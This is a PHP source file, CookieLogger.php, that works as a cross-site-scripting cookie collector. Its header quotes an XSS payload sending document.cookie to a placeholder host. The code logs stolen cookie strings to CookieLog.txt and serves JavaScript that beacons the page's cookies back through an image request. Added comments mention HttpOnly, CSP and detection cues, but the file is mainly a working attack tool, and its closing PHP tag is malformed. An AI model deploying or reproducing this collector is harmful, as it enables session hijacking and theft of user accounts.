1 | <?php | |
2 | /* | |
3 | * Created on 16. april. 2007 | |
4 | * Created by Audun Larsen (audun@munio.no) | |
5 | * | |
6 | * Copyright 2006 Munio IT, Audun Larsen | |
7 | * | |
8 | * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, | |
9 | * INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS | |
10 | * FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE | |
11 | * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES | |
12 | * (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; | |
13 | * OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, | |
14 | * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, | |
15 | * EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. | |
16 | * | |
17 | * CookieLogger.php | |
18 | * CookieLog.txt | |
19 | * | |
20 | * PAYLOAD XSS | |
21 | * <script>document.location="http://www.host.com/mysite/CookieLogger.php?cookie=" + document.cookie;</script> | |
22 | */ | |
23 | ||
// Collection endpoint for the cookie-theft payload quoted in the file header:
// any request that carries a query string has that string URL-decoded and
// appended, one line per request, to ./CookieLog.txt next to this script.
// Only the query string is stored (no timestamp, client address or referrer),
// so an investigator has to correlate entries with the web server's access log.
// Defensive context: document.cookie never exposes cookies set with HttpOnly,
// which keeps session identifiers out of a log like this even when a page is
// vulnerable to script injection.
$queryString = $_SERVER['QUERY_STRING'];
if (strlen($queryString) > 0) {
    $logHandle = fopen('./CookieLog.txt', 'a'); // append mode: earlier entries are kept
    $logLine = urldecode($queryString) . "\n";
    fwrite($logHandle, $logLine);
    fclose($logHandle);
} else {
    // No query string: everything after the closing tag is sent verbatim as
    // the response body (JavaScript source, with no surrounding markup).
    // NOTE(review): HTTP_HOST and PHP_SELF are taken from the request and are
    // echoed into a JavaScript string literal without any escaping.
?>

var ownUrl = 'http://<?= $_SERVER['HTTP_HOST'] ?><?= $_SERVER['PHP_SELF'] ?>';
32 | ||
33 | // == | |
34 | // URLEncode and URLDecode functions | |
35 | // | |
36 | // Copyright Albion Research Ltd. 2002 | |
37 | // http://www.albionresearch.com/ | |
38 | // | |
39 | // You may copy these functions providing that | |
40 | // (a) you leave this copyright notice intact, and | |
41 | // (b) if you use these functions on a publicly accessible | |
42 | // web site you include a credit somewhere on the web site | |
43 | // with a link back to http://www.albionresearch.com/ | |
44 | // | |
45 | // If you find or fix any bugs, please let us know at albionresearch.com | |
46 | // | |
47 | // SpecialThanks to Neelesh Thakur for being the first to | |
48 | // report a bug in URLDecode() - now fixed 2003-02-19. | |
49 | // And thanks to everyone else who has provided comments and suggestions. | |
50 | // == | |
// Encodes a string in application/x-www-form-urlencoded style.
//   - a space becomes "+"
//   - digits, ASCII letters and the RFC 2396 mark characters pass through
//   - any other character with a code of 255 or less becomes %XX (upper-case hex)
//   - a character with a code above 255 raises an alert() and is replaced by
//     "+", so the encoding is lossy for such input
// Returns the encoded string.
function URLEncode(str)
{
    var UNRESERVED = "0123456789" +              // digits
        "ABCDEFGHIJKLMNOPQRSTUVWXYZ" +           // upper-case letters
        "abcdefghijklmnopqrstuvwxyz" +           // lower-case letters
        "-_.!~*'()";                             // RFC 2396 mark characters
    var HEX_DIGITS = "0123456789ABCDEF";

    var out = "";
    for (var pos = 0; pos < str.length; pos++) {
        var c = str.charAt(pos);

        if (c == " ") {
            out += "+"; // form encoding uses "+" rather than %20
            continue;
        }
        if (UNRESERVED.indexOf(c) != -1) {
            out += c;
            continue;
        }

        var code = c.charCodeAt(0);
        if (code > 255) {
            // Only 8-bit values fit the two-hex-digit escape used below.
            alert( "Unicode Character '"
                    + c
                    + "' cannot be encoded using standard URL encoding.\n" +
                      "(URL encoding only supports 8-bit characters.)\n" +
                      "A space (+) will be substituted." );
            out += "+";
            continue;
        }

        // High nibble first, then low nibble.
        out += "%" + HEX_DIGITS.charAt((code >> 4) & 0xF) + HEX_DIGITS.charAt(code & 0xF);
    }

    return out;
};
88 | ||
// Beacon step: the page's cookies are URL-encoded, placed in the query string
// of an <img> tag that points back at this script, and written into the
// document, so loading the image delivers them to the logging branch.
// Detection cue for defenders: an image request to an unrelated host whose
// query string is a URL-encoded cookie string. A Content-Security-Policy that
// restricts script and image sources limits this request pattern.
cookie = URLEncode(document.cookie);
html = ['<img src="', ownUrl, '?', cookie, '">'].join('');
document.write(html);
92 | ||
93 | < ?php | |
94 | } | |
95 | ?> |